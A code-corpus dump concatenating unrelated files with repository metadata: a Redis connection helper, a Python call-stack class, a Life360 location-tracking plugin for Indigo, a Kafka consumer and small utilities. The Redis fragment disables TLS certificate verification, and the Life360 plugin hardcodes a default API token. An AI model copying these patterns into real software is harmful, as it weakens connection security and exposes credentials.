    # "rediss" scheme means TLS; skip certificate verification (see docstring).
    if urlparse(redis_url).scheme == "rediss":
        kwargs["ssl_cert_reqs"] = None
    return redis.from_url(**kwargs)
30.454545
78
0.723881
95
670
4.978947
0.589474
0.084567
0
0
0
0
0
0
0
0
0
0.007407
0.19403
670
21
79
31.904762
0.868519
0.435821
0
0
0
0
0.150997
0.062678
0
0
0
0
0
1
0.111111
false
0
0.333333
0
0.555556
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
ddabee57641e5f2212bdb1af4233c76d2dc9db3e
2,238
py
Python
introspection/call_stack.py
Aran-Fey/introspection
0ce3a16688b51bdcb72c7b070d571a1004f5151b
[ "MIT" ]
1
2022-03-02T23:13:06.000Z
2022-03-02T23:13:06.000Z
introspection/call_stack.py
Aran-Fey/introspection
0ce3a16688b51bdcb72c7b070d571a1004f5151b
[ "MIT" ]
null
null
null
introspection/call_stack.py
Aran-Fey/introspection
0ce3a16688b51bdcb72c7b070d571a1004f5151b
[ "MIT" ]
null
null
null
import types
from typing import Iterable, Union

from .call_frame import CallFrame

__all__ = ['CallStack']


class CallStack:
    """
    Represents the call stack - a series of :class:`CallFrame` instances.

    Instances behave like a read-only list: they support iteration,
    indexing, membership testing, etc. Index 0 holds the root frame.

    Because holding references to call frames can create reference
    cycles, it's recommended to use ``CallStack`` objects as context
    managers. Upon exit, the frame objects are released and the
    CallStack becomes empty::

        with CallStack.current() as stack:
            ...  # do something with the stack

        # at this point, len(stack) is 0
    """
    __slots__ = ('__stack',)

    def __init__(self, frames: Iterable[Union[CallFrame, types.FrameType]]):
        """
        Creates a new ``CallStack`` from the given frame objects.

        :param frames: An iterable of frame objects, starting with the root frame
        """
        self.__stack = [CallFrame.from_frame(raw) for raw in frames]

    @classmethod
    def current(cls) -> 'CallStack':
        """
        Get the current call stack.
        """
        with CallFrame.current() as frame:
            # Skip this classmethod's own frame: start from the caller.
            return cls.from_frame(frame.parent)

    @classmethod
    def from_frame(cls, frame) -> 'CallStack':
        """
        Creates a ``CallStack`` containing ``frame`` and all its parents.

        :param frame: The last frame in the call stack
        :return: A new ``CallStack`` instance
        """
        chain = []
        current_frame = frame
        while current_frame is not None:
            chain.append(current_frame)
            current_frame = current_frame.f_back
        chain.reverse()  # oldest (root) frame first
        return cls(chain)

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Drop the frame references to break potential reference cycles.
        self.__stack.clear()

    def __iter__(self):
        return iter(self.__stack)

    def __reversed__(self):
        return reversed(self.__stack)

    def __getitem__(self, index):
        return self.__stack[index]

    def __len__(self):
        return len(self.__stack)

    def __contains__(self, frame):
        return frame in self.__stack
26.963855
156
0.626005
273
2,238
4.897436
0.40293
0.059835
0.02917
0
0
0
0
0
0
0
0
0.001252
0.28597
2,238
82
157
27.292683
0.835419
0.38874
0
0.055556
0
0
0.028455
0
0
0
0
0
0
1
0.277778
false
0
0.083333
0.166667
0.638889
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
0
0
0
2
ddb85f6c9f54c6a26a73cc1b1e07e1f705ce4e40
124
py
Python
test_suite/suite/test09/other_mod.py
joncatanio/cannoli
410f6bea362bf9e33eecc0e01fb080dadd14ef23
[ "MIT" ]
755
2017-12-09T05:34:43.000Z
2022-03-26T09:15:56.000Z
test_suite/suite/test09/other_mod.py
joncatanio/cannoli
410f6bea362bf9e33eecc0e01fb080dadd14ef23
[ "MIT" ]
8
2017-12-12T01:03:18.000Z
2020-06-29T01:41:03.000Z
test_suite/suite/test09/other_mod.py
joncatanio/cannoli
410f6bea362bf9e33eecc0e01fb080dadd14ef23
[ "MIT" ]
23
2018-05-17T17:48:23.000Z
2022-03-26T09:15:57.000Z
import some_mod


def functione(b):
    """Print *b*, then report the test class's ``hello`` attribute."""
    instance = some_mod.some_class()
    print(b)
    print("othermod calling in " + str(instance.hello))
17.714286
47
0.669355
20
124
4
0.7
0.175
0
0
0
0
0
0
0
0
0
0
0.193548
124
6
48
20.666667
0.8
0
0
0
0
0
0.16129
0
0
0
0
0
0
1
0.2
false
0
0.2
0
0.4
0.4
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
ddc39e71f4d5f6b6a53e16b07decfbb4b7887488
12,963
py
Python
life360.indigoPlugin/Contents/Server Plugin/plugin.py
ryanbuckner/life360-plugin
3e64108b91c4ee0f4f85f6e7aa31fa7bd1b1d6fe
[ "MIT" ]
1
2021-09-25T15:43:00.000Z
2021-09-25T15:43:00.000Z
life360.indigoPlugin/Contents/Server Plugin/plugin.py
ryanbuckner/life360-plugin
3e64108b91c4ee0f4f85f6e7aa31fa7bd1b1d6fe
[ "MIT" ]
null
null
null
life360.indigoPlugin/Contents/Server Plugin/plugin.py
ryanbuckner/life360-plugin
3e64108b91c4ee0f4f85f6e7aa31fa7bd1b1d6fe
[ "MIT" ]
null
null
null
#! /usr/bin/env python
# -*- coding: utf-8 -*-
####################
# Copyright (c) 2021 ryanbuckner
# https://github.com/ryanbuckner/life360-plugin/wiki
#
# Based on neilk's Solcast plugin
################################################################################
# Imports
################################################################################
import indigo
import sys
from life360 import life360
import datetime

try:
    from geopy.geocoders import Nominatim
except ImportError:
    # BUG FIX: the original handler called self.logger.debug() at module
    # scope, where no ``self`` exists, so a missing geopy crashed the import
    # with a NameError instead of logging the problem.
    Nominatim = None
    indigo.server.log("Geopy python library is not found. Try reinstalling the Plugin")

################################################################################
# Globals
################################################################################


################################################################################
class Plugin(indigo.PluginBase):
    """Indigo plugin that mirrors Life360 member locations into Indigo devices."""

    ########################################
    def __init__(self, pluginId, pluginDisplayName, pluginVersion, pluginPrefs):
        super(Plugin, self).__init__(pluginId, pluginDisplayName, pluginVersion, pluginPrefs)
        self.debug = pluginPrefs.get("showDebugInfo", False)
        self.deviceList = []
        try:
            self.authorization_token = self.pluginPrefs.get('authorizationtoken', 'cFJFcXVnYWJSZXRyZTRFc3RldGhlcnVmcmVQdW1hbUV4dWNyRUh1YzptM2ZydXBSZXRSZXN3ZXJFQ2hBUHJFOTZxYWtFZHI0Vg')
            self.username = self.pluginPrefs.get('life360_username', None)
            self.password = self.pluginPrefs.get('life360_password', None)
            self.refresh_frequency = self.pluginPrefs.get('refresh_frequency', 30)
            self.logger.debug("Success retriving preferences from Plugin config")
        except Exception:
            self.logger.error("Error retrieving Plugin preferences. Please use Configure to set")

        self.logger.info(u"")
        self.logger.info(u"{0:=^130}".format("Starting Life360 Plugin Engine"))
        self.logger.info(u"{0:<30} {1}".format("Plugin name:", pluginDisplayName))
        self.logger.info(u"{0:<30} {1}".format("Plugin version:", pluginVersion))
        self.logger.info(u"{0:<30} {1}".format("Plugin ID:", pluginId))
        self.logger.info(u"{0:<30} {1}".format("Refresh Frequency:", str(self.refresh_frequency) + " seconds"))
        self.logger.info(u"{0:<30} {1}".format("Indigo version:", indigo.server.version))
        self.logger.info(u"{0:<30} {1}".format("Python version:", sys.version.replace('\n', '')))
        self.logger.info(u"{0:<30} {1}".format("Python Directory:", sys.prefix.replace('\n', '')))
        self.logger.info(u"{0:=^130}".format(""))
        self.life360data = {}
        self.member_list = {}

    ########################################
    def deviceStartComm(self, device):
        """Register *device* and refresh its states when it comes online."""
        self.logger.debug("Starting device: " + device.name)
        device.stateListOrDisplayStateIdChanged()
        if device.id not in self.deviceList:
            self.update(device)
            self.deviceList.append(device.id)

    ########################################
    def deviceStopComm(self, device):
        """Forget *device* when it goes offline."""
        self.logger.debug("Stopping device: " + device.name)
        if device.id in self.deviceList:
            self.deviceList.remove(device.id)

    ########################################
    def runConcurrentThread(self):
        """Poll the Life360 API on the configured interval until stopped."""
        self.logger.debug("Starting concurrent thread")
        try:
            pollingFreq = int(self.pluginPrefs['refresh_frequency']) * 1
        except Exception:
            pollingFreq = 60
        self.logger.debug("Current polling frequency is: " + str(pollingFreq) + " seconds")

        # Refresh device states immediately after restarting the Plugin
        iterationcount = 1
        try:
            while True:
                if (iterationcount > 1):
                    self.sleep(1 * pollingFreq)
                self.get_new_life360json()
                iterationcount += 1
                for deviceId in self.deviceList:
                    # call the update method with the device instance
                    self.update(indigo.devices[deviceId])
                    self.updatedevicestates(indigo.devices[deviceId])
        except self.StopThread:
            pass

    ########################################
    def update(self, device):
        """Per-device refresh hook; currently a no-op."""
        #self.logger.debug(device.name)
        # device.stateListOrDisplayStateIdChanged()
        return

    ########################################
    # UI Validate, Device Config
    ########################################
    def validateDeviceConfigUi(self, valuesDict, typeId, device):
        return (True, valuesDict)

    # assigns the device.address to the value of the member.id
    def menuChanged(self, valuesDict=None, typeId=None, devId=None):
        self.create_member_list()
        self.logger.debug(self.member_list)
        if valuesDict['membername'] in self.member_list:
            tempName = valuesDict['membername']
            valuesDict['address'] = self.member_list[tempName]  # m['id']
        else:
            valuesDict['address'] = "Unknown"
        return valuesDict

    # dump JSON to event log
    def write_json_to_log(self):
        if (len(self.life360data) == 0):
            self.get_new_life360json()
        self.logger.debug(self.life360data)
        if (not self.debug):
            indigo.server.log("Life360 data has been written to the debugLog. If you did not see it you may need to enable debugging in the Plugin Config UI")
        return

    ########################################
    # UI Validate, Plugin Preferences
    ########################################
    def validatePrefsConfigUi(self, valuesDict):
        """Validate the plugin prefs dialog; returns Indigo's (ok, values[, errors]) tuple."""
        if int(valuesDict['refresh_frequency']) < 15:
            self.logger.error("Invalid entry for Refresh Frequency - must be greater than 15")
            errorsDict = indigo.Dict()
            errorsDict['refresh_frequency'] = "Invalid entry for Refresh Frequency - must be greater than 15"
            return (False, valuesDict, errorsDict)
        if (not valuesDict['life360_username']):
            self.logger.error("Invalid entry for Life360 username - cannot be empty")
            errorsDict = indigo.Dict()
            errorsDict['life360_username'] = "Invalid entry for Life360 username - cannot be empty"
            return (False, valuesDict, errorsDict)
        # Cheap email sanity checks: must contain '@' and '.'.
        if (valuesDict['life360_username'].find('@') == -1):
            self.logger.error("Invalid entry for Life360 username - must be a valid email address")
            errorsDict = indigo.Dict()
            errorsDict['life360_username'] = "Invalid entry for Life360 username - must be a valid email address"
            return (False, valuesDict, errorsDict)
        if (valuesDict['life360_username'].find('.') == -1):
            self.logger.error("Invalid entry for Life360 username - must be a valid email address")
            errorsDict = indigo.Dict()
            errorsDict['life360_username'] = "Invalid entry for Life360 username - must be a valid email address"
            return (False, valuesDict, errorsDict)
        if (not valuesDict['life360_password']):
            self.logger.error("Invalid entry for Life360 password - cannot be empty")
            errorsDict = indigo.Dict()
            errorsDict['life360_password'] = "Invalid entry for Life360 password - cannot be empty"
            return (False, valuesDict, errorsDict)
        auth_result = self.validate_api_auth(valuesDict['life360_username'], valuesDict['life360_password'], valuesDict['authorizationtoken'])
        if (not auth_result):
            self.logger.error("Life360 API Authentication failed - check your username and password")
            errorsDict = indigo.Dict()
            errorsDict['life360_password'] = "Life360 API Authentication failed - check your username and password"
            return (False, valuesDict, errorsDict)
        self.debug = valuesDict['showDebugInfo']
        self.logger.debug("Debug set to: " + str(self.debug))
        return (True, valuesDict)

    def validate_api_auth(self, username, password, authorization_token):
        """Return True when the Life360 API accepts these credentials."""
        api = life360(authorization_token=authorization_token, username=username, password=password)
        try:
            if api.authenticate():
                self.logger.debug("Validation of API was successful")
                return True
            else:
                self.logger.debug("Validation of API FAILED")
                return False
        except Exception as e:
            # BUG FIX: generic exceptions have no ``.msg`` attribute in
            # Python 3; use str(e) so the handler itself cannot raise.
            self.logger.debug("Error authenticating: " + str(e))
            return False

    def get_member_list(self, filter="", valuesDict=None, typeId="", targetId=0):
        """Indigo menu callback: return circle member first names."""
        if (len(self.member_list) == 0):
            self.create_member_list()
        retList = list(self.member_list.keys())
        return retList

    def get_new_life360json(self):
        """Fetch the first circle's data from Life360 into self.life360data."""
        api = life360(authorization_token=self.authorization_token, username=self.username, password=self.password)
        if api.authenticate():
            try:
                self.logger.debug("Attepting to get list of circles")
                circles = api.get_circles()
                # Only the first circle is supported.
                circle_id = circles[0]['id']
                circle = api.get_circle(circle_id)
                self.life360data = circle
                self.create_member_list()
            except Exception as e:
                # BUG FIX: ``e.message`` does not exist in Python 3.
                self.logger.error(str(e))
        else:
            self.logger.error("Error retrieving new Life360 JSON, Make sure you have the correct credentials in Plugin Config")
        return

    def create_member_list(self):
        """Rebuild the {first name: member id} map from the cached circle data."""
        if len(self.life360data) == 0:
            self.get_new_life360json()
        self.member_list.clear()
        for m in self.life360data['members']:
            self.member_list[m['firstName']] = m['id']
        return

    def toggleDebugging(self):
        """Menu item: flip debug logging on/off and persist the choice."""
        if self.debug:
            self.debug = False
            self.logger.info(u"Turning off debug logging (Toggle Debugging menu item chosen).")
            self.pluginPrefs['showDebugInfo'] = False
        else:
            self.debug = True
            self.pluginPrefs['showDebugInfo'] = True
            self.logger.debug(u"Turning on debug logging (Toggle Debugging menu item chosen).")

    ############################
    # Action Method
    #############################
    def refresh_member_data(self, pluginAction, device):
        """Action callback: force a fresh fetch and push states to *device*."""
        self.get_new_life360json()
        self.updatedevicestates(device)
        return

    def isDriving(self, speed_int):
        """Return 1 when the (adjusted) speed suggests driving, else 0."""
        if (round(speed_int) > 1):
            return 1
        else:
            return 0

    def mphSpeed(self, speed_int):
        """Return the API speed scaled to MPH, as a string."""
        if speed_int < 2:
            return str(speed_int)
        else:
            return str(round(2.2 * speed_int))

    def updatedevicestates(self, device):
        """Push the matching Life360 member's data into *device*'s states."""
        device_states = []
        member_device = device.pluginProps['membername']
        member_device_address = device.address
        self.logger.debug("Updating device: " + member_device)
        try:
            geocoder = Nominatim(user_agent='life360')
        except Exception:
            self.logger.error("Error instantiating geocoder object")
            pass
        if self.life360data['members']:
            for m in self.life360data['members']:
                if ((m['id'] == member_device_address) and (m['location'])):
                    x = datetime.datetime.now()
                    cur_date_time = x.strftime("%m/%d/%Y %I:%M %p")
                    # the raw speed from Life360 is exstimated to be MPH/2.2
                    adjustedSpeed = self.mphSpeed(float(m['location']['speed']))
                    # the raw Life360 isDriving boolean always comes back 0.
                    # Let's use speed to determine isDriving for Indigo
                    adjustedDriving = self.isDriving(float(adjustedSpeed))
                    device_states.append({'key': 'member_id', 'value': m['id']})
                    device_states.append({'key': 'member_avatar', 'value': m['avatar']})
                    device_states.append({'key': 'member_first_name', 'value': m['firstName']})
                    device_states.append({'key': 'member_last_name', 'value': m['lastName']})
                    device_states.append({'key': 'member_phone_num', 'value': m['loginPhone']})
                    device_states.append({'key': 'member_email', 'value': m['loginEmail']})
                    device_states.append({'key': 'last_api_update', 'value': str(cur_date_time)})
                    device_states.append({'key': 'member_360_location', 'value': m['location']['name']})
                    device_states.append({'key': 'member_battery', 'value': m['location']['battery']})
                    device_states.append({'key': 'batteryLevel', 'value': int(float(m['location']['battery']))})
                    device_states.append({'key': 'member_wifi', 'value': m['location']['wifiState']})
                    device_states.append({'key': 'member_battery_charging', 'value': m['location']['charge']})
                    device_states.append({'key': 'member_in_transit', 'value': m['location']['inTransit']})
                    device_states.append({'key': 'member_driveSDKStatus', 'value': m['location']['driveSDKStatus']})
                    device_states.append({'key': 'member_lat', 'value': float(m['location']['latitude'])})
                    device_states.append({'key': 'member_long', 'value': float(m['location']['longitude'])})
                    device_states.append({'key': 'member_is_driving', 'value': adjustedDriving})
                    device_states.append({'key': 'member_speed', 'value': adjustedSpeed})
                    try:
                        # get address from lat long information
                        loclat = float(m['location']['latitude'])
                        loclng = float(m['location']['longitude'])
                        geoloc = geocoder.reverse((loclat, loclng))
                        currentaddress = geoloc
                    except Exception as g:
                        self.logger.debug(u"Geocoder error")
                        currentaddress = "-geocoder error-"
                    device_states.append({'key': 'member_closest_address', 'value': str(currentaddress)})
                    if (m['location']['since']):
                        sincedate = datetime.datetime.fromtimestamp(m['location']['since'])
                        sincedatestr = sincedate.strftime("%m/%d/%Y %I:%M %p")
                        device_states.append({'key': 'member_location_since_datetime', 'value': sincedatestr})
                    else:
                        device_states.append({'key': 'member_location_since_datetime', 'value': ''})
                    if (m['location']['name'] == "Home"):
                        device.updateStateImageOnServer(indigo.kStateImageSel.MotionSensorTripped)
                    else:
                        # BUG FIX: ``indigo.kStateImageSel.None`` is a SyntaxError in
                        # Python 3 (None is a keyword); fetch the member by name.
                        # TODO(review): confirm whether the installed Indigo API names
                        # this member "None" or "NoImage".
                        device.updateStateImageOnServer(getattr(indigo.kStateImageSel, "None"))
            device.updateStatesOnServer(device_states)
        else:
            pass
        return
36.931624
174
0.66011
1,493
12,963
5.632954
0.206966
0.045184
0.044946
0.052438
0.314388
0.245898
0.209275
0.174078
0.136385
0.091558
0
0.020093
0.140014
12,963
351
175
36.931624
0.734302
0.056468
0
0.268908
0
0.004202
0.281817
0.019839
0
0
0
0
0
0
null
null
0.058824
0.021008
null
null
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
1
0
0
0
0
0
2
ddd0baa5f55beee804fd811c66a9f9297112106b
444
py
Python
snippets/3DEM/useful_bits/scratch_hdf5_2_nii.py
michielkleinnijenhuis/EM
f46a9b11298919b359e80d9f23a7e824df1356cb
[ "Apache-2.0" ]
null
null
null
snippets/3DEM/useful_bits/scratch_hdf5_2_nii.py
michielkleinnijenhuis/EM
f46a9b11298919b359e80d9f23a7e824df1356cb
[ "Apache-2.0" ]
null
null
null
snippets/3DEM/useful_bits/scratch_hdf5_2_nii.py
michielkleinnijenhuis/EM
f46a9b11298919b359e80d9f23a7e824df1356cb
[ "Apache-2.0" ]
null
null
null
### get all the blocked raw datafiles from ARC and convert to nifti's ### #rsync -avz ndcn0180@arcus.arc.ox.ac.uk:/data/ndcn-fmrib-water-brain/ndcn0180/EM/M3/M3_S1_GNU/testblock/m000_?????-?????_?????-?????_?????-?????.h5 /Users/michielk/oxdata/P01/EM/M3/M3_S1_GNU/ for f in `ls m000_?????-?????_?????-?????_?????-?????.h5`; do python $scriptdir/convert/EM_stack2stack.py ${f} ${f/.h5/.nii.gz} -i 'zyx' -l 'xyz' -e -0.0073 -0.0073 0.05 -u done
74
191
0.614865
75
444
3.493333
0.76
0.030534
0.045802
0.061069
0.083969
0
0
0
0
0
0
0.096059
0.085586
444
5
192
88.8
0.549261
0.576577
0
0
0
0
0.033333
0
0
0
0
0
0
0
null
null
0
0
null
null
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
ddd71b2e4c6346f49e71518346e30e3f595d4613
1,169
py
Python
lf3py/task/data.py
rog-works/lf3py
e89937f7aa133ed54d85764f06101ab9abf6b960
[ "CNRI-Python" ]
null
null
null
lf3py/task/data.py
rog-works/lf3py
e89937f7aa133ed54d85764f06101ab9abf6b960
[ "CNRI-Python" ]
48
2020-12-19T13:47:26.000Z
2021-01-07T22:27:56.000Z
lf3py/task/data.py
rog-works/lf3py
e89937f7aa133ed54d85764f06101ab9abf6b960
[ "CNRI-Python" ]
null
null
null
from abc import ABCMeta, abstractmethod
from dataclasses import dataclass
from typing import Any, List, Type, TypeVar

from lf3py.lang.dsn import DSN
from lf3py.serialization.serializer import DictSerializer, Serializer

T_OBJ = TypeVar('T_OBJ')


class Command(metaclass=ABCMeta):
    """Abstract task command, addressed by a DSN and carrying a typed payload."""

    @property
    @abstractmethod
    def dsn(self) -> DSN:
        raise NotImplementedError()

    @abstractmethod
    def data(self, data_type: Type[T_OBJ]) -> T_OBJ:
        raise NotImplementedError()


class CommandQueue:
    """FIFO queue of Command objects, consumed by iterating over it."""

    def __init__(self) -> None:
        self._queue: List[Command] = []

    @property
    def has_next(self) -> bool:
        # Non-empty queue means there is something left to consume.
        return bool(self._queue)

    def enqueue(self, *commands: Command):
        self._queue.extend(commands)

    def __iter__(self) -> 'CommandQueue':
        return self

    def __next__(self) -> Command:
        if not self.has_next:
            raise StopIteration()
        # Detach the head; the remainder becomes the new backing list.
        head, *tail = self._queue
        self._queue = tail
        return head


@dataclass
class Result:
    _serializer: Serializer = DictSerializer()

    def serialize(self) -> Any:
        return self._serializer.serialize(self)


Ok = Result()
21.648148
69
0.662104
134
1,169
5.574627
0.380597
0.072289
0.026774
0
0
0
0
0
0
0
0
0.005618
0.238666
1,169
53
70
22.056604
0.833708
0
0
0.166667
0
0
0.014542
0
0
0
0
0
0
1
0.222222
false
0
0.138889
0.083333
0.583333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
dde5915014c5c7fff2dcda09f7e0ecc75334cecc
398
py
Python
downloadHSfiles.py
McDowellLab/downloadNEON
b43d47d40cbf0e168dfa307969687025e3f5fa34
[ "MIT" ]
null
null
null
downloadHSfiles.py
McDowellLab/downloadNEON
b43d47d40cbf0e168dfa307969687025e3f5fa34
[ "MIT" ]
null
null
null
downloadHSfiles.py
McDowellLab/downloadNEON
b43d47d40cbf0e168dfa307969687025e3f5fa34
[ "MIT" ]
null
null
null
from hs_restclient import HydroShare, HydroShareAuthBasic # Download LCZO sesnor database from Hydroshare # link to the Hydroshare resource https://www.hydroshare.org/resource/b38bc00887ec45ac9499f9dea45eb8d5/ auth = HydroShareAuthBasic(username="miguelcleon", password = "x") hs = HydroShare(auth = auth) hs.getResource('b38bc00887ec45ac9499f9dea45eb8d5', destination='./lczodata', unzip=True)
39.8
103
0.81407
40
398
8.075
0.7
0
0
0
0
0
0
0
0
0
0
0.099448
0.090452
398
9
104
44.222222
0.792818
0.369347
0
0
0
0
0.218623
0.129555
0
0
0
0
0
1
0
false
0.25
0.25
0
0.25
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
2
dde641d979074c8c01c9f5c1fbef8f55228ae8fe
339
py
Python
protonfixes/gamefixes/287260.py
bmaupin/protonfixes
9fc87a9a487d7dfbd0c602a079f3b026f8a84638
[ "BSD-2-Clause" ]
213
2018-10-06T01:40:26.000Z
2022-03-16T16:17:37.000Z
protonfixes/gamefixes/287260.py
bmaupin/protonfixes
9fc87a9a487d7dfbd0c602a079f3b026f8a84638
[ "BSD-2-Clause" ]
88
2018-10-06T17:38:56.000Z
2022-02-19T13:27:26.000Z
protonfixes/gamefixes/287260.py
bmaupin/protonfixes
9fc87a9a487d7dfbd0c602a079f3b026f8a84638
[ "BSD-2-Clause" ]
67
2018-10-09T16:57:16.000Z
2022-03-14T13:06:25.000Z
""" Game fix for Toybox Turbos """ #pylint: disable=C0103 from protonfixes import util from protonfixes.logger import log def main(): """ Changes the proton argument from the launcher to the game """ log('Applying fixes for Toybox Turbos') # Fix infinite startup screen util.set_environment('PROTON_NO_ESYNC', '1')
21.1875
65
0.707965
46
339
5.152174
0.695652
0.075949
0.126582
0
0
0
0
0
0
0
0
0.018382
0.19764
339
15
66
22.6
0.852941
0.41003
0
0
0
0
0.259459
0
0
0
0
0
0
1
0.2
true
0
0.4
0
0.6
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
2
ddea0dbcc4c809d7b5a35e5b2781bf028ff2f764
140
py
Python
tests/framework/Optimizers/Infinite/infinite.py
milljm/raven
5f29fe81b75e2ffbeb54a55aa63647e7b2f6457b
[ "Apache-2.0" ]
2
2019-10-11T15:59:10.000Z
2021-04-08T18:23:57.000Z
tests/framework/Optimizers/Infinite/infinite.py
milljm/raven
5f29fe81b75e2ffbeb54a55aa63647e7b2f6457b
[ "Apache-2.0" ]
1
2018-03-27T13:06:00.000Z
2018-03-27T13:06:00.000Z
tests/framework/Optimizers/Infinite/infinite.py
milljm/raven
5f29fe81b75e2ffbeb54a55aa63647e7b2f6457b
[ "Apache-2.0" ]
1
2017-08-29T16:09:13.000Z
2017-08-29T16:09:13.000Z
import numpy as np


def run(self, Inputs):
    """Store y/x on *self* as ``ans``; when x is zero, store an array holding inf.

    ``Inputs`` is accepted for framework interface compatibility and is unused.
    """
    if self.x == 0.0:
        self.ans = np.array([float('inf')])
    else:
        self.ans = self.y / self.x
15.555556
39
0.592857
26
140
3.192308
0.653846
0.120482
0
0
0
0
0
0
0
0
0
0.018349
0.221429
140
8
40
17.5
0.743119
0
0
0
0
0
0.021583
0
0
0
0
0
0
1
0.166667
false
0
0.166667
0
0.333333
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
ddf357f8f64530a6e0a779ab33c258cb0322ac3e
189
py
Python
kafka/1/consumer/kaktatest.py
adriancarriger/experiments
7e4248592dc8fbb08522c9b5f0393c80dc7e2699
[ "MIT" ]
1
2021-06-22T13:38:36.000Z
2021-06-22T13:38:36.000Z
kafka/1/consumer/kaktatest.py
adriancarriger/experiments
7e4248592dc8fbb08522c9b5f0393c80dc7e2699
[ "MIT" ]
108
2019-05-23T16:12:32.000Z
2020-09-04T15:47:33.000Z
kafka/1/consumer/kaktatest.py
adriancarriger/experiments
7e4248592dc8fbb08522c9b5f0393c80dc7e2699
[ "MIT" ]
null
null
null
from kafka import KafkaConsumer

# Consume from 'myTestTopic' on a local single-broker Kafka instance.
consumer = KafkaConsumer('myTestTopic', bootstrap_servers='localhost:9092')

# Blocks indefinitely, printing each record as it arrives.
for item in consumer:
    print("The Message is :", item)

# https://kafka-1:9092
31.5
75
0.756614
24
189
5.916667
0.791667
0
0
0
0
0
0
0
0
0
0
0.054217
0.121693
189
5
76
37.8
0.801205
0.10582
0
0
0
0
0.245509
0
0
0
0
0
0
1
0
false
0
0.25
0
0.25
0.25
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
fb07d1f256a2f6d7a6cc9dbdf801ef7f4558d52a
323
py
Python
TP_ALGO_3/convert.py
PierreLeGuen/ALGO_S5
9067e887d14fe997c6944292a0cff23ceda47b6e
[ "MIT" ]
null
null
null
TP_ALGO_3/convert.py
PierreLeGuen/ALGO_S5
9067e887d14fe997c6944292a0cff23ceda47b6e
[ "MIT" ]
null
null
null
TP_ALGO_3/convert.py
PierreLeGuen/ALGO_S5
9067e887d14fe997c6944292a0cff23ceda47b6e
[ "MIT" ]
null
null
null
def convert(n, base):
    """Return the digits of non-negative *n* written in *base*, most-significant first."""
    if n < base:
        res = str(n)
    else:
        res = convert(n // base, base) + str(n % base)
    return res


print(convert(10, 2))


def convert_inv(n, base):
    """Return the digits of non-negative *n* in *base*, least-significant first.

    BUG FIX: the recursive call used ``convert`` instead of ``convert_inv``,
    so only the first digit was moved and all deeper digits kept the normal
    order (e.g. convert_inv(4, 2) returned '010' instead of '001').
    """
    if n < base:
        res = str(n)
    else:
        res = str(n % base) + convert_inv(n // base, base)
    return res


print(convert_inv(10, 2))
16.15
49
0.544892
52
323
3.346154
0.25
0.229885
0.206897
0.091954
0.586207
0.298851
0.298851
0.298851
0.298851
0.298851
0
0.026549
0.30031
323
19
50
17
0.743363
0
0
0.571429
0
0
0
0
0
0
0
0
0
1
0.142857
false
0
0
0
0.285714
0.142857
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
fb0b24730ac65daad4c5e515482703fc512b4066
300
py
Python
output/models/nist_data/list_pkg/non_positive_integer/schema_instance/nistschema_sv_iv_list_non_positive_integer_length_1_xsd/__init__.py
tefra/xsdata-w3c-tests
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
[ "MIT" ]
1
2021-08-14T17:59:21.000Z
2021-08-14T17:59:21.000Z
output/models/nist_data/list_pkg/non_positive_integer/schema_instance/nistschema_sv_iv_list_non_positive_integer_length_1_xsd/__init__.py
tefra/xsdata-w3c-tests
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
[ "MIT" ]
4
2020-02-12T21:30:44.000Z
2020-04-15T20:06:46.000Z
output/models/nist_data/list_pkg/non_positive_integer/schema_instance/nistschema_sv_iv_list_non_positive_integer_length_1_xsd/__init__.py
tefra/xsdata-w3c-tests
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
[ "MIT" ]
null
null
null
from output.models.nist_data.list_pkg.non_positive_integer.schema_instance.nistschema_sv_iv_list_non_positive_integer_length_1_xsd.nistschema_sv_iv_list_non_positive_integer_length_1 import NistschemaSvIvListNonPositiveIntegerLength1 __all__ = [ "NistschemaSvIvListNonPositiveIntegerLength1", ]
50
233
0.91
35
300
7.057143
0.6
0.133603
0.218623
0.145749
0.348178
0.348178
0.348178
0.348178
0.348178
0
0
0.013986
0.046667
300
5
234
60
0.84965
0
0
0
0
0
0.143333
0.143333
0
0
0
0
0
1
0
false
0
0.25
0
0.25
0
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
fb1aa25d697063ac5234b37a20af2edde89cf7c2
825
py
Python
2 - python intermediario/63 - iteraveis/64 - comportamento iteradores e geradores.py
AdrianaViabL/Curso-Python-udemy
a4f230354985d0f6026a1e7b4913a8f64e205654
[ "Apache-2.0" ]
null
null
null
